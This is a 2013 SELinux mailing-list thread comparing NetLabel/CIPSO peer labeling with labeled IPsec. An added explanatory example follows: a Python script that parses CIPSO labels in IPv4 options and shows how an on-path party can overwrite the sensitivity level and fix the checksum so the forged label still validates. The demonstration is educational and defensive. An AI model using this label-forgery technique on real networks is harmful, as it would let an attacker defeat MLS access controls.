RE: SELinux network labeling

Great, thank you guys for the clarification. Unfortunately I can't explain too much more about our specific configuration, but I think I am headed down the correct path now with the netlabel/CIPSO peer labeling.

Just a general question about the CIPSO labeling: Is there anything that SELinux does to prevent an adversary from modifying the CIPSO label while on the wire? From what I can tell one would have to rely on other security measures like authentication/encryption to prevent this. I guess this may be a benefit of IPSec peer labeling since it provides authentication and encryption in addition to network labeling. The reason I ruled out IPSec labeling is that we are using Openswan for IPSec and it is my understanding after talking with Josh Brindle that labeling is not supported in Openswan. Are there any plans to bring labeled associations to Openswan?

Blake Langland

-----Original Message-----
From: Paul Moore [mailto:paul@xxxxxxxxxxxxxx] 
Sent: Wednesday, March 13, 2013 7:03 AM
To: Langland, Blake
Cc: Stephen Smalley; selinux@xxxxxxxxxxxxx
Subject: Re: SELinux network labeling

On Wednesday, March 13, 2013 09:36:39 AM Stephen Smalley wrote:
> netlabel vs labeled ipsec:  netlabel only supports passing MLS labels 
> via CIPSO, no user:role:type preservation.  labeled ipsec supports 
> passing the entire security context, including user:role:type.

Just one quick comment, and a word of caution, that the differences between CIPSO and labeled IPsec are much greater than what is described above.

From a SELinux policy perspective Stephen does touch on the main point: CIPSO labeled traffic will look like system_u:object_r:netlabel_peer_t:{MLS-LABEL} to SELinux regardless of the user:role:type of the sender (only the "MLS-LABEL" information is passed over the wire) while labeled IPsec will pass the full context over the wire.  However, stepping back from just the SELinux policy there are other differences between the two protocols that need to be considered when building a full solution.

--
paul moore
www.paul-moore.com



--
This message was distributed to subscribers of the selinux mailing list.
If you no longer wish to subscribe, send mail to majordomo@xxxxxxxxxxxxx with
the words "unsubscribe selinux" without quotes as the message.
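Added example, not code from this thread or from the Linux NetLabel project, illustrating the on-the-wire question raised above. CIPSO rides in the IPv4 options field (option type 134: length, a 4-byte DOI, then tags; tag type 1 is the "restricted bitmap" tag carrying a sensitivity level and a category bitmap, which Linux NetLabel supports). Nothing in that encoding is integrity-protected: the only check a receiver has at the IP layer is the header checksum, which anyone on the path can recompute. The script builds a constructed header (addresses 10.0.0.1/10.0.0.2, DOI 1, level 3, categories {0, 5} are made up for the example), parses the label back, then rewrites the level and fixes the checksum so the forged header verifies cleanly. That is the gap Blake's message points at; protecting the label needs an authenticated channel such as IPsec AH/ESP (which is what labeled IPsec gets for free), CIPSO itself offers none.

```python
"""CIPSO (IPv4 option 134) label parser plus an on-path tamper demonstration.

Added example; constructed packet, addresses and DOI, not taken from the thread.
"""
import socket
import struct

CIPSO_OPT = 134            # IPv4 option type for CIPSO (FIPS 188)
TAG_RESTRICTED_BITMAP = 1  # tag: [type=1, len, align=0, level, bitmap...]


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum over the header; returns 0 when a filled-in checksum is valid."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def fix_checksum(header: bytes) -> bytes:
    """Recompute the IPv4 header checksum (bytes 10-11) for an arbitrary header."""
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    return header[:10] + struct.pack("!H", ipv4_checksum(zeroed)) + header[12:]


def build_cipso_option(doi: int, level: int, categories) -> bytes:
    """Encode type 134, length, DOI and one tag-type-1 tag.
    Category 0 is the most significant bit of the first bitmap octet."""
    bitmap = bytearray((max(categories) // 8 + 1) if categories else 0)
    for c in categories:
        bitmap[c // 8] |= 0x80 >> (c % 8)
    tag = bytes([TAG_RESTRICTED_BITMAP, 4 + len(bitmap), 0, level]) + bytes(bitmap)
    body = struct.pack("!I", doi) + tag
    return bytes([CIPSO_OPT, 2 + len(body)]) + body


def build_ipv4_header(src: str, dst: str, option: bytes) -> bytes:
    """Minimal IPv4 header (no payload) carrying `option`, EOL-padded to 32 bits."""
    opts = option + b"\x00" * (-len(option) % 4)
    ihl = 5 + len(opts) // 4
    hdr = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, ihl * 4, 0x1234, 0, 64, 6, 0,
                      socket.inet_aton(src), socket.inet_aton(dst)) + opts
    return fix_checksum(hdr)


def _cipso_tags(header: bytes):
    """Walk the IPv4 options; return (doi, [(tag_type, abs_offset, tag_len), ...])."""
    ihl = (header[0] & 0x0F) * 4
    if ihl < 20 or len(header) < ihl:
        raise ValueError("bad IHL")
    if ipv4_checksum(header[:ihl]) != 0:
        raise ValueError("IPv4 header checksum mismatch")
    i = 20
    while i < ihl:
        otype = header[i]
        if otype == 0:          # EOL: end of option list
            break
        if otype == 1:          # NOP: single-byte padding
            i += 1
            continue
        olen = header[i + 1] if i + 1 < ihl else 0
        if olen < 2 or i + olen > ihl:
            raise ValueError("bad option length")
        if otype == CIPSO_OPT:
            if olen < 6:
                raise ValueError("CIPSO option too short for DOI")
            doi = struct.unpack("!I", header[i + 2:i + 6])[0]
            tags, j, end = [], i + 6, i + olen
            while j < end:
                if j + 1 >= end or header[j + 1] < 4 or j + header[j + 1] > end:
                    raise ValueError("bad CIPSO tag length")
                tags.append((header[j], j, header[j + 1]))
                j += header[j + 1]
            return doi, tags
        i += olen
    raise ValueError("no CIPSO option present")


def parse_cipso(header: bytes) -> dict:
    """Return {'doi', 'level', 'categories'} from the restricted-bitmap tag."""
    doi, tags = _cipso_tags(header)
    for ttype, off, tlen in tags:
        if ttype == TAG_RESTRICTED_BITMAP:
            bitmap = header[off + 4:off + tlen]
            cats = [8 * n + b for n, byte in enumerate(bitmap)
                    for b in range(8) if byte & (0x80 >> b)]
            return {"doi": doi, "level": header[off + 3], "categories": cats}
    raise ValueError("no restricted-bitmap tag")


def rewrite_level(header: bytes, new_level: int) -> bytes:
    """What an on-path attacker can do: overwrite the level byte and recompute
    the checksum. The result passes every check the IP layer has."""
    _, tags = _cipso_tags(header)
    for ttype, off, _tlen in tags:
        if ttype == TAG_RESTRICTED_BITMAP:
            patched = bytearray(header)
            patched[off + 3] = new_level
            return fix_checksum(bytes(patched))
    raise ValueError("no restricted-bitmap tag")


if __name__ == "__main__":
    hdr = build_ipv4_header("10.0.0.1", "10.0.0.2",
                            build_cipso_option(doi=1, level=3, categories=[0, 5]))
    print("sender's label: ", parse_cipso(hdr))
    forged = rewrite_level(hdr, 0)
    print("after tampering:", parse_cipso(forged))   # parses fine, checksum still valid
```

The receiver's view after `rewrite_level` is a well-formed packet whose label simply says something else; SELinux will map it to netlabel_peer_t with whatever MLS level the attacker chose. A flipped byte without the checksum fix is the only "tamper" this layer catches, and that is a transmission-error check, not a security control.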

